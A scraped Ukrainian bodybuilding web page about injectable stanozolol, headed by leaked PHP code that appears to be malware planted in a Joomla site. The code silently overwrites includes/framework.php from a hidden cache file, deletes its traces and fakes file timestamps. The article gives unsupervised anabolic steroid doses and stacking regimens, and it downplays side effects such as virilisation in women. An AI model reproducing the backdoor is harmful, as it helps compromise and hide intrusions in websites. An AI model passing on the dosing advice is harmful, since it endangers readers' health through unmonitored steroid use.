$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Станазолол | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Станазолол

СтаназололОсобливості ін'єкційного Станазолола в тому, що його діюча хімічна речовина розчинена не в маслі, а у воді. І хоча майже кожен спортсмен бодібілдингу, що має досвід у стероїдах, знає цю різницю, на практиці ці знання рідко застосовують. Проміжки між ін'єкціями Станазололу тривалої дії мають бути коротшими, ніж при інших стероїдах. Це означає, що Станазолол тривалої дії вводиться частіше, ніж розчинені в олії стероїди (так саме як, наприклад, Прімоболан, Дека-дураболін, сустанон 250, Параболан тощо). Причиною є відносно короткий період напіврозпаду розчинених у воді стероїдів, які швидко потрапляють в кров, але діють недовго.

Практика показала, що Станазолол тривалої дії 50 мг / мл повинен вводитися щонайменше двічі на день і найкращі результати спостерігаються при денній дозі в 50 мг. Діюча хімічна речовина станозололу - це похідна дигідротестостерону, отже, Станазолол тривалої дії не ароматизується в естрогени і тільки в рідкісних випадках викликає скупчення води.

На підставі цих двох властивостей головна область застосування Станазолола тривалої дії бодібілдинг: період підготовки до змагань. У поєднані з обмеженою в калоріях дієтою, яка багата на білки, Станазолол тривалої дії надає мускулатурі твердість і пружність. Станазолол тривалої дії при дієті приймається не як єдиний стероїд, тому що внаслідок свого невеликого андрогеного компонента він мало захищає атлета від пошкоджень м'язової тканини. Відсутність вираженого андрогеного впливу компенсується з комбінованим застосуванням Параболана. Комбінація Станазолола 50 мг на день і Параболана 50 мг на день є "Топ-комбінацією чемпіонатів".

Залежно від рівня досягнень атлета приймають, як правило, 50 мг Станазолола тривалої дії кожні 1-2 дні і Параболан 25-75 мг щодня. Хоча немає ніякого наукового обґрунтування на користь особливої взаємодії Станазолола тривалої дії і Параболана, дуже ймовірний сінергістичний ефект на підставі багаточислених прикладів з практики. Інші стероїди, які успішно приймаються в момент підготовки до чемпіонатів разом з Станазололом тривалої дії, це Венобол, Галотестін, оксандролон, тестостеронпропіонат, Прімоболан і гормони росту.

станозолол вредСтаназолол тривалої дії годиться все ж не тільки для підготовки до чемпіонатів, але і у фазі нарощування. Оскільки він не сприяє накопиченню води, швидкі прирости ваги з Станазололом украй рідкісні. І все ж таки відбувається солідний приріст мускулатури і сильніший за пропорцією підйом сили, які в міру припинення прийому препарату найчастіше зберігаються. Спортсмени бодібілдингу, які хочуть наростити силу і масу, часто комбінують Станазолол тривалої дії з Діанаболом, Анаполоном 50, тестостероном і Дека-дураболіном. З комбінацією з 100 мг Анаполона 50 в день, 50 мг Станазолола тривалої дії в день і 400 мг Дека-дураболіну на тиждень спортсмен дуже повільно підходить до доз амбітних атлетів від великого спорту. Атлети старшої вікової групи і новачки в стероїдних курсах можуть досягти гарного прогресу з Станазололом тривалої дії і Дека-дураболіном або з Станазололом тривалої дії і Прімоболаном тривалої дії. При цьому в їх розпорядженні ще відносно нешкідлива комбінація, яка, як правило, не викликає значних побічних явищ і залишає новачкам у стероїдних курсах ще багато місця для "більш сильних" штучок, які в цій фазі ще не потрібні. Станазолол тривалої дії головним чином анаболічний стероїд з відносно помірно вираженою андрогеною дією, яка може проте стати помітною у жінок при дозі лише в 50 мг на тиждень, у чоловіків - у більш високих дозах. І в атлеток найчастіше виникають проблеми при вживані 50 мг двічі на тиждень. Хоча вплив Станазолола тривалої дії через кілька днів помітно зменшується і потрібні щонайменше ін'єкції 2 рази на тиждень, при цьому можуть виникнути небажані скупчення андрогенів в жіночому організмі, які тягнуть за собою явища вірилізації. І низький голос тієї чи іншої спортсменки пояснюється, звичайно, Станазололом тривалої дії. І все ж доза в 50 мг Станазолола тривалої дії кожен другий день у амбітних атлеток швидше правило, ніж виняток. Інші неандрогенообумовлені побічні явища, такі як головні болі, м'язові спазми, показники HDL і LDL, в рідкісних випадках підвищений артеріальний тиск можуть проявлятися як у жінок так і в чоловіків. Можливість пошкодження печінки при ін'єкційній формі Станазолола дуже мала, та все ж при великих дозах може виникнути підвищення показників печінки. Оскільки Станазолол тривалої дії розчинений у воді, ін'єкції, як правило, трохи більш неприємні і болючіші, ніж у випадках масляних розчинів.

Є й ще один недолік, тому що при частих ін'єкціях поступово утворюється рубцева тканина на сідницях, що змушує атлетів вводити Станазолол в плечі, ноги або навіть в ікри. І хоча це лише необхідність, ін'єкції Станазолола в певні групи м'язів здобувають все більшу популярність, оскільки атлети помітили, що при цьому відбувається прискорене зростання зачепленого м'яза.
 
Статті СТЕРОЇДИ Станазолол